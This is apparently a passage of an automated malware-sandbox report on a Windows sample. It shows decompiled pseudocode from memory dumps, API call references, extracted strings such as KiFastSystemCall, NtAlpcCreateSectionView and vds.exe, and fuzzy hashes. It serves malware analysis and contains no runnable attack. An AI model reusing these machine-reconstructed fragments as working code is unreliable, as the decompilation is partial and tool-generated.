                                                										_t156 = 0x0000000f &  *(_t217 - 4);
                                                										__eflags = 0xf;
                                                									}
                                                									 *(_t217 - 4) = _t156 | _t238;
                                                									_t161 = _t174;
                                                									_t196 =  *(_t205 - 4);
                                                									__eflags = _t196 & 0x00000001;
                                                									if((_t196 & 0x00000001) != 0) {
                                                										_t131 = _t205;
                                                										_t197 = _t196 & 0xfffffff0;
                                                										_t161 = _t161 + _t197;
                                                										_t205 = _t205 + _t197;
                                                										__eflags = _t197 - 0xb30;
                                                										if(_t197 >= 0xb30) {
                                                											E00402B84(_t131);
                                                										}
                                                									} else {
                                                										 *(_t205 - 4) = _t196 | 0x00000008;
                                                									}
                                                									 *((intOrPtr*)(_t205 - 8)) = _t161;
                                                									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
                                                									__eflags = _t161 - 0xb30;
                                                									if(_t161 >= 0xb30) {
                                                										E00402BC4(_t217 + _t238, _t174, _t161);
                                                									}
                                                									 *0x500ae4 = 0;
                                                									return _t217;
                                                								} else {
                                                									__eflags = __edx - 0x2cc;
                                                									if(__edx < 0x2cc) {
                                                										_t213 = __edx;
                                                										_t140 = E00402FAC(__edx);
                                                										__eflags = _t140;
                                                										if(_t140 != 0) {
                                                											_t241 = _t140;
                                                											E00402B68(_t217, _t213, _t140);
                                                											E00403330(_t217, _t213, _t241);
                                                											_t140 = _t241;
                                                										}
                                                										return _t140;
                                                									} else {
                                                										_t176 = 0xb2c;
                                                										__eflags = _t171 - 0xb2c;
                                                										if(_t171 <= 0xb2c) {
                                                											goto L37;
                                                										} else {
                                                											goto L41;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								L37:
                                                								return _t66;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					__ebx =  *__ecx;
                                                					__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                					__eflags = __ecx - __edx;
                                                					if(__ecx < __edx) {
                                                						__ecx = __ecx + __ecx + 0x20;
                                                						_push(__edi);
                                                						__edi = __edx;
                                                						__eax = 0;
                                                						__ecx = __ecx - __edx;
                                                						asm("adc eax, 0xffffffff");
                                                						__eax = 0 & __ecx;
                                                						__eax = (0 & __ecx) + __edx;
                                                						__eax = E00402FAC((0 & __ecx) + __edx);
                                                						__eflags = __eax;
                                                						if(__eax != 0) {
                                                							__eflags = __edi - 0x40a2c;
                                                							if(__edi > 0x40a2c) {
                                                								 *(__eax - 8) = __edi;
                                                							}
                                                							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                							__edx = __eax;
                                                							__edi = __eax;
                                                							 *((intOrPtr*)(__ebx + 0x1c))() = E00403330(__esi, __edi, __ebp);
                                                							__eax = __edi;
                                                						}
                                                						_pop(__edi);
                                                						_pop(__esi);
                                                						_pop(__ebx);
                                                						return __eax;
                                                					} else {
                                                						__ebx = 0x40 + __edx * 4;
                                                						__eflags = 0x40 + __edx * 4 - __ecx;
                                                						if(0x40 + __edx * 4 < __ecx) {
                                                							__ebx = __edx;
                                                							__eax = __edx;
                                                							__eax = E00402FAC(__edx);
                                                							__eflags = __eax;
                                                							if(__eax != 0) {
                                                								__ecx = __ebx;
                                                								__edx = __eax;
                                                								__ebx = __eax;
                                                								__esi = E00403330(__esi, __edi, __ebp);
                                                								__eax = __ebx;
                                                							}
                                                							_pop(__esi);
                                                							_pop(__ebx);
                                                							return __eax;
                                                						} else {
                                                							_pop(__esi);
                                                							_pop(__ebx);
                                                							return __eax;
                                                						}
                                                					}
                                                				}
                                                			}
                                                0x0040380f
                                                0x00403811
                                                0x00403811
                                                0x00403814
                                                0x0040381c
                                                0x00403823
                                                0x0040382e
                                                0x0040382e
                                                0x004036fb
                                                0x004036fb
                                                0x004036fe
                                                0x00403701
                                                0x00403703
                                                0x00000000
                                                0x00403709
                                                0x00403709
                                                0x00403710
                                                0x0040376d
                                                0x0040376d
                                                0x00403772
                                                0x00403778
                                                0x0040377d
                                                0x0040377e
                                                0x0040377e
                                                0x0040378a
                                                0x0040379b
                                                0x004037a1
                                                0x004037a1
                                                0x004037a3
                                                0x004037b0
                                                0x004037b7
                                                0x004037bb
                                                0x004037bd
                                                0x004037c3
                                                0x004037c5
                                                0x004037c7
                                                0x004037c7
                                                0x004037a5
                                                0x004037a5
                                                0x004037a9
                                                0x004037a9
                                                0x004037cc
                                                0x004037cc
                                                0x004037ce
                                                0x004037d1
                                                0x004037d8
                                                0x004037da
                                                0x004037de
                                                0x00403712
                                                0x00403712
                                                0x00403717
                                                0x0040371f
                                                0x00000000
                                                0x00000000
                                                0x00403721
                                                0x00403723
                                                0x0040372a
                                                0x00000000
                                                0x0040372c
                                                0x00403730
                                                0x00403735
                                                0x00403736
                                                0x0040373c
                                                0x00403744
                                                0x0040374a
                                                0x0040374f
                                                0x00403750
                                                0x00000000
                                                0x00403750
                                                0x00403744
                                                0x00000000
                                                0x0040372a
                                                0x00403759
                                                0x0040375c
                                                0x0040375f
                                                0x00403761
                                                0x004037e1
                                                0x004037e1
                                                0x00000000
                                                0x00403763
                                                0x00403763
                                                0x00403766
                                                0x00403769
                                                0x0040376b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040376b
                                                0x00403761
                                                0x00403710
                                                0x00403703
                                                0x004035e1
                                                0x004035e4
                                                0x004035e6
                                                0x004035f0
                                                0x004035f6
                                                0x0040360d
                                                0x0040360d
                                                0x00403619
                                                0x0040361f
                                                0x00403621
                                                0x00403628
                                                0x0040362a
                                                0x0040362f
                                                0x00403637
                                                0x00000000
                                                0x00000000
                                                0x00403639
                                                0x0040363b
                                                0x00403642
                                                0x00000000
                                                0x00403644
                                                0x00403647
                                                0x0040364c
                                                0x00403652
                                                0x0040365a
                                                0x0040365f
                                                0x00403664
                                                0x00000000
                                                0x00403664
                                                0x0040365a
                                                0x00000000
                                                0x00403642
                                                0x0040366d
                                                0x0040366d
                                                0x0040366d
                                                0x00403672
                                                0x00403675
                                                0x00403677
                                                0x0040367a
                                                0x0040367d
                                                0x00403688
                                                0x0040368a
                                                0x0040368d
                                                0x0040368f
                                                0x00403691
                                                0x00403697
                                                0x00403699
                                                0x00403699
                                                0x0040367f
                                                0x00403682
                                                0x00403682
                                                0x0040369e
                                                0x004036a4
                                                0x004036a8
                                                0x004036ae
                                                0x004036b5
                                                0x004036b5
                                                0x004036ba
                                                0x004036c7
                                                0x004035f8
                                                0x004035f8
                                                0x004035fe
                                                0x004036c8
                                                0x004036cc
                                                0x004036d1
                                                0x004036d3
                                                0x004036d5
                                                0x004036dd
                                                0x004036e4
                                                0x004036e9
                                                0x004036e9
                                                0x004036ef
                                                0x00403604
                                                0x00403604
                                                0x00403609
                                                0x0040360b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040360b
                                                0x004035fe
                                                0x004035e8
                                                0x004035e8
                                                0x004035ec
                                                0x004035ec
                                                0x004035e6
                                                0x004035db
                                                0x00403538
                                                0x00403538
                                                0x0040353a
                                                0x0040353e
                                                0x00403541
                                                0x00403543
                                                0x0040357c
                                                0x00403580
                                                0x00403581
                                                0x00403583
                                                0x00403585
                                                0x00403587
                                                0x0040358a
                                                0x0040358c
                                                0x0040358e
                                                0x00403593
                                                0x00403595
                                                0x00403597
                                                0x0040359d
                                                0x0040359f
                                                0x0040359f
                                                0x004035a6
                                                0x004035a6
                                                0x004035a9
                                                0x004035ab
                                                0x004035b4
                                                0x004035b9
                                                0x004035b9
                                                0x004035bb
                                                0x004035bc
                                                0x004035bd
                                                0x004035be
                                                0x00403545
                                                0x00403545
                                                0x0040354c
                                                0x0040354e
                                                0x00403554
                                                0x00403556
                                                0x00403558
                                                0x0040355d
                                                0x0040355f
                                                0x00403561
                                                0x00403563
                                                0x00403565
                                                0x00403570
                                                0x00403575
                                                0x00403575
                                                0x00403577
                                                0x00403578
                                                0x00403579
                                                0x00403550
                                                0x00403550
                                                0x00403551
                                                0x00403552
                                                0x00403552
                                                0x0040354e
                                                0x00403543

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3183777298c1953730924ae46fe703b514a5b9445081ccb82ff3e28789d1999b
                                                • Instruction ID: 03e027181e797ee74e0e208850b210cacaba8f3fa97c8cd7352cecbef8438de8
                                                • Opcode Fuzzy Hash: 3183777298c1953730924ae46fe703b514a5b9445081ccb82ff3e28789d1999b
                                                • Instruction Fuzzy Hash: 11C146A27102011BD714AE7DDE8976EB7999BC4316F18823FF504EB3D2DABCC9458348
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00863C16
                                                • GetShortPathNameW.KERNEL32(00000000,00000000,00000000), ref: 00863DE6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: NamePathShort
                                                • String ID: KiFastSystemCall$NtAlpcCreateSectionView$Z$vds.exe
                                                • API String ID: 1295925010-1335456658
                                                • Opcode ID: 23d48eafaaa863904ca986844ce5866d1a09921b8318287c91bf3a3f28abedd6
                                                • Instruction ID: 3ed59f7a06b7e5e64e7eab2f35ab7c230cae75af575dc9c8b9436602fecf8007
                                                • Opcode Fuzzy Hash: 23d48eafaaa863904ca986844ce5866d1a09921b8318287c91bf3a3f28abedd6
                                                • Instruction Fuzzy Hash: F902E474A10248EFDB10CFAAE985AADBBF1FB08306B118536E405E7370D774A961CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ad6521ae12515eb28223b666269dac296373ae40520598bf23df21f4c4dd2f1
                                                • Instruction ID: d0bcd14a6e0e49d86c59fb88a46d8f141ce1466ac89bcfd3b644c21892c97a9a
                                                • Opcode Fuzzy Hash: 3ad6521ae12515eb28223b666269dac296373ae40520598bf23df21f4c4dd2f1
                                                • Instruction Fuzzy Hash: 45B127A27006044BDF149A7CDC8576EB3859BC43A1F18C239F25CCB396EA7CDE46A351
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0077BB14
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 3c69c3a2c73478c5e45cecb158df72672313abf9503702f4a583c6c81048d671
                                                • Instruction ID: 23058478752afdd8d0cf0ef6e2473ff5ff3cb86f5334748de15c61facf7de239
                                                • Opcode Fuzzy Hash: 3c69c3a2c73478c5e45cecb158df72672313abf9503702f4a583c6c81048d671
                                                • Instruction Fuzzy Hash: 96A160B5A00249DFDF21CFA8D885BAEB7B5FF58340F14C129E509A7391DB78A944CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00775F84: GetCurrentThreadId.KERNEL32 ref: 00775F87
                                                • GetTickCount.KERNEL32 ref: 00775B2F
                                                • GetTickCount.KERNEL32 ref: 00775B47
                                                • GetCurrentThreadId.KERNEL32 ref: 00775B76
                                                • GetTickCount.KERNEL32 ref: 00775BA1
                                                • GetTickCount.KERNEL32 ref: 00775BD8
                                                • GetTickCount.KERNEL32 ref: 00775C02
                                                • GetCurrentThreadId.KERNEL32 ref: 00775C72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: CountTick$CurrentThread
                                                • String ID:
                                                • API String ID: 3968769311-0
                                                • Opcode ID: 8e05b2835f912d5448ddb0ab1285d504b76c81195dda1a43b3c6481437eb11fb
                                                • Instruction ID: 8ad3e24297488830315a5dfdd59308e3cfd4d44b4b63b493f0c3c0b129ee32b8
                                                • Opcode Fuzzy Hash: 8e05b2835f912d5448ddb0ab1285d504b76c81195dda1a43b3c6481437eb11fb
                                                • Instruction Fuzzy Hash: 58418671608B418EDF21EF7CC48432EBBD1AF94394F15C92CD4DC87292E7B998819792
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00787647
                                                • GetModuleFileNameW.KERNEL32(00503620,?,00000105,?,?,00000105), ref: 00787662
                                                • LoadStringW.USER32(00000000,0040C120,?,00000100), ref: 007876FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileModuleName$LoadString
                                                • String ID: `uA$`uA$duA
                                                • API String ID: 213155056-422646958
                                                • Opcode ID: c544facb1dd57c42c7e708fe08ed04c52eccc436e6b324ec1a69ba7e0a3735da
                                                • Instruction ID: 6bffa47ef9141a09e348480a5059cf06815b14a378e95ae108f29a619660f5d1
                                                • Opcode Fuzzy Hash: c544facb1dd57c42c7e708fe08ed04c52eccc436e6b324ec1a69ba7e0a3735da
                                                • Instruction Fuzzy Hash: F5413C70A44618DFDB20EF68CC85AC9B7FAAB49340F5080E6E508E7251E77A9E94CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007875F0: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 00787647
                                                  • Part of subcall function 007875F0: GetModuleFileNameW.KERNEL32(00503620,?,00000105,?,?,00000105), ref: 00787662
                                                  • Part of subcall function 007875F0: LoadStringW.USER32(00000000,0040C120,?,00000100), ref: 007876FD
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0078787C
                                                • GetStdHandle.KERNEL32(000000F4,004176D8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 007878A8
                                                • WriteFile.KERNEL32(00000000,000000F4,004176D8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 007878AE
                                                • LoadStringW.USER32(00000000,0040C0A8,?,00000040), ref: 007878D2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: File$LoadModuleNameString$ByteCharHandleMultiWideWrite
                                                • String ID: PRQDl$luA
                                                • API String ID: 1413667788-1867814159
                                                • Opcode ID: f9032f570ae7a13e91aa6ede140f78ce3a7f3cb139baf9ce415d91c86863261d
                                                • Instruction ID: ab2304e43740b7b4e24152c8399c17bafc35e6a66a90b0d4734dccd182eef3ac
                                                • Opcode Fuzzy Hash: f9032f570ae7a13e91aa6ede140f78ce3a7f3cb139baf9ce415d91c86863261d
                                                • Instruction Fuzzy Hash: 213186B1684204FFEB15E794CC46FEA77ACEB08750F608065B608E71D2DE746E40CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 36%
                                                			E00405620(void* __edx) {
                                                				signed int _v8;
                                                				intOrPtr _v12;
                                                				char _v16;
                                                				char* _t23;
                                                				intOrPtr _t29;
                                                				intOrPtr _t39;
                                                				void* _t41;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                
                                                				_t41 = _t43;
                                                				_t44 = _t43 + 0xfffffff4;
                                                				_v16 = 0;
                                                				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
                                                					L10:
                                                					_v8 = 0x40;
                                                					goto L11;
                                                				} else {
                                                					_t23 =  &_v16;
                                                					_push(_t23);
                                                					_push(0);
                                                					L004028CC();
                                                					if(_t23 != 0 || GetLastError() != 0x7a) {
                                                						goto L10;
                                                					} else {
                                                						_v12 = E004044B4(_v16);
                                                						_push(_t41);
                                                						_push(E004056CE);
                                                						_push( *[fs:edx]);
                                                						 *[fs:edx] = _t44;
                                                						_push( &_v16);
                                                						_push(_v12);
                                                						L004028CC();
                                                						_t29 = _v12;
                                                						if(_v16 <= 0) {
                                                							L8:
                                                							_pop(_t39);
                                                							 *[fs:eax] = _t39;
                                                							_push(E004056D5);
                                                							return E004044D0(_v12);
                                                						} else {
                                                							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
                                                								_t29 = _t29 + 0x18;
                                                								_v16 = _v16 - 0x18;
                                                								if(_v16 > 0) {
                                                									continue;
                                                								} else {
                                                									goto L8;
                                                								}
                                                								goto L12;
                                                							}
                                                							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
                                                							E00406264();
                                                							L11:
                                                							return _v8;
                                                						}
                                                					}
                                                				}
                                                				L12:
                                                			}













                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00405635
                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040563B
                                                • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 00405657
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: AddressErrorHandleLastModuleProc
                                                • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                • API String ID: 4275029093-79381301
                                                • Opcode ID: c2084c094475ba784c2c756125d5cc50a2fab7027d67d9af656c44ef014f062f
                                                • Instruction ID: 619608bb65db88defe486723605b8ecd8e02af69365a59580d4b8b268f9d3c7c
                                                • Opcode Fuzzy Hash: c2084c094475ba784c2c756125d5cc50a2fab7027d67d9af656c44ef014f062f
                                                • Instruction Fuzzy Hash: AE113371D00608AFDB10EBA5C94575FB7B8DB40318F6088BBE418B76C1D67D89448E59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F4,)@,00000000,?,00000000,00000000,000000F4,)@,00000000,?,00000000,?,?,00000000,0077446F), ref: 00773B0B
                                                • WriteFile.KERNEL32(00000000,000000F4,)@,00000000,?,00000000,00000000,000000F4,)@,00000000,?,00000000,?,?,00000000,0077446F), ref: 00773B11
                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,)@,00000000,?,00000000,00000000,000000F4,)@,00000000,?), ref: 00773B28
                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,)@,00000000,?,00000000,00000000,000000F4,)@,00000000), ref: 00773B2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileHandleWrite
                                                • String ID: )@$)@
                                                • API String ID: 3320372497-924509997
                                                • Opcode ID: 8e71eb6d23d6d8ab8cfadc474005c443bbeeb358ce6ec74b12084cc19a9b66c0
                                                • Instruction ID: fc52ceb9504e5bbcac9d0c520a4f2e3c73bd759d61c4e0049bf784d48ec03dd1
                                                • Opcode Fuzzy Hash: 8e71eb6d23d6d8ab8cfadc474005c443bbeeb358ce6ec74b12084cc19a9b66c0
                                                • Instruction Fuzzy Hash: F70136D1604211FDE900F7A89C8EFAB278C8B057A8F148621762CE20D3D92C5D49D679
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 43%
                                                			E0040670C(void* __ecx) {
                                                				long _v4;
                                                				void* _t3;
                                                				void* _t9;
                                                
                                                				if( *0x500054 == 0) {
                                                					if( *0x4fd026 == 0) {
                                                						_push(0);
                                                						_push("Error");
                                                						_push("Runtime error     at 00000000");
                                                						_push(0);
                                                						L00402844();
                                                					}
                                                					return _t3;
                                                				} else {
                                                					if( *0x500340 == 0xd7b2 &&  *0x500348 > 0) {
                                                						 *0x500358();
                                                					}
                                                					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
                                                					_t9 = E00406FFC(0x4067a0);
                                                					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
                                                				}
                                                			}







                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 00406745
                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554,?,004068DE,004045A3,004045EA), ref: 0040674B
                                                • GetStdHandle.KERNEL32(000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA,?,?,004FC554), ref: 00406766
                                                • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,004FC554,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,004FC554,00000000,?,004067CA), ref: 0040676C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: FileHandleWrite
                                                • String ID: Error$Runtime error at 00000000
                                                • API String ID: 3320372497-2970929446
                                                • Opcode ID: eda4de2550d5145e072844f60e8d4c50491e1b9c71102fdff190c436ce87094c
                                                • Instruction ID: b37dff71a96f27208a7e33f64d0fbb077a09dd40f3e9c51218416e66017629e3
                                                • Opcode Fuzzy Hash: eda4de2550d5145e072844f60e8d4c50491e1b9c71102fdff190c436ce87094c
                                                • Instruction Fuzzy Hash: 33F0F6A0A443047AF611B3945D4AFAE275C8B40B1DF61063FF7107A0D2DAFC48C8922E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlLeaveCriticalSection.NTDLL(00502C0C), ref: 007790EA
                                                • RtlEnterCriticalSection.NTDLL(00502C0C), ref: 00779168
                                                • RtlLeaveCriticalSection.NTDLL(00502C0C), ref: 00779191
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter
                                                • String ID: en-US,en,
                                                • API String ID: 2978645861-3579323720
                                                • Opcode ID: 1ebe573edee942a8ff334357550a8f6dabcec30c9967b4c44dfadf6ec17d7289
                                                • Instruction ID: ed6d91cdb56a7d0dfde5e08c0a72d4c4522b8b6c22ff08e6fe1425239c2255d8
                                                • Opcode Fuzzy Hash: 1ebe573edee942a8ff334357550a8f6dabcec30c9967b4c44dfadf6ec17d7289
                                                • Instruction Fuzzy Hash: DB21C320704205E7EF25B7788C4E62D2699AB48790F60C822F64C932D3DD7C9D02CA66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 00776995
                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 0077699B
                                                • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?), ref: 007769B6
                                                • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A), ref: 007769BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileHandleWrite
                                                • String ID: Runtime error at 00000000
                                                • API String ID: 3320372497-1393363852
                                                • Opcode ID: 4c568e31d2edb777dba30f4ee85161ac086da8f41786dad9347262c7ad6e2a72
                                                • Instruction ID: 7b59f6c28421e3c9bdb8d8a9d97b09fdf9d038813b9056169aed2a65bfc0407e
                                                • Opcode Fuzzy Hash: 4c568e31d2edb777dba30f4ee85161ac086da8f41786dad9347262c7ad6e2a72
                                                • Instruction Fuzzy Hash: B0F0F6A0A44300B9EE10B3A44C0FFBD27589740F55F68951AB728780D7CABC68C99A25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Sleep.KERNEL32(00000000,?,?,00000000,007731F2), ref: 00773616
                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,007731F2), ref: 00773630
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: f44237ee4e40f2228f8e82a2b21e0a766cbb1adddc56f87a23eb6cfeadbeb2bb
                                                • Instruction ID: 822a6ed0a2c3abf572c95960dfe26981dd730f598bdc399bda5ba68a6bc4729b
                                                • Opcode Fuzzy Hash: f44237ee4e40f2228f8e82a2b21e0a766cbb1adddc56f87a23eb6cfeadbeb2bb
                                                • Instruction Fuzzy Hash: 2861D1716012809FEB15CF28C989B5ABBD0AB95390F18C1AEE44CCB392D679CE45EB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 008645CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: DirectoryWindows
                                                • String ID: "$*$NtSetDefaultLocale
                                                • API String ID: 3619848164-1193084605
                                                • Opcode ID: c59c192a5197979d71822e1f3e3513f585cbd6a727926c0a443b641e7b3fe29d
                                                • Instruction ID: 868650d0a5d7a990ef1e6031e728ab27058ae7038359694946a22c3a9c71a977
                                                • Opcode Fuzzy Hash: c59c192a5197979d71822e1f3e3513f585cbd6a727926c0a443b641e7b3fe29d
                                                • Instruction Fuzzy Hash: 28E10574D00258DFCB50DFAAE988AADBBF1FB09302F21953AE409E7225D7349951CF19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00776A2A
                                                • FreeLibrary.KERNEL32(00400000,?,?,?,?,00776B2E,007747F3,0077483A,?,?,00774853), ref: 00776AC8
                                                • ExitProcess.KERNEL32(00000000,?,?,?,?,00776B2E,007747F3,0077483A,?,?,00774853), ref: 00776B01
                                                  • Part of subcall function 0077695C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 00776995
                                                  • Part of subcall function 0077695C: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 0077699B
                                                  • Part of subcall function 0077695C: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?), ref: 007769B6
                                                  • Part of subcall function 0077695C: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A), ref: 007769BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316352725.0000000000770000.00000040.00000001.sdmp, Offset: 00770000, based on PE: false
                                                Similarity
                                                • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                • String ID: MZP
                                                • API String ID: 3490077880-2889622443
                                                • Opcode ID: 23b108cd9283b6578c60080867c59299f4d863ae87d8b998b6c8ab3550617874
                                                • Instruction ID: c5cd6e3b90d30b6bff5c0e69b8756c58925350faed7324223d4983b47ec13941
                                                • Opcode Fuzzy Hash: 23b108cd9283b6578c60080867c59299f4d863ae87d8b998b6c8ab3550617874
                                                • Instruction Fuzzy Hash: B331A420A00B41DFDF31AB74884C71A7BE06F15394F16C829E54D9729AD77CDC88CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentThreadId.KERNEL32 ref: 00776A2A
                                                • FreeLibrary.KERNEL32(00400000,?,?,?,?,00776B2E,007747F3,0077483A,?,?,00774853), ref: 00776AC8
                                                • ExitProcess.KERNEL32(00000000,?,?,?,?,00776B2E,007747F3,0077483A,?,?,00774853), ref: 00776B01
                                                  • Part of subcall function 0077695C: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00776A1A,?,?,?,?,00776B2E,007747F3,0077483A), ref: 00776995
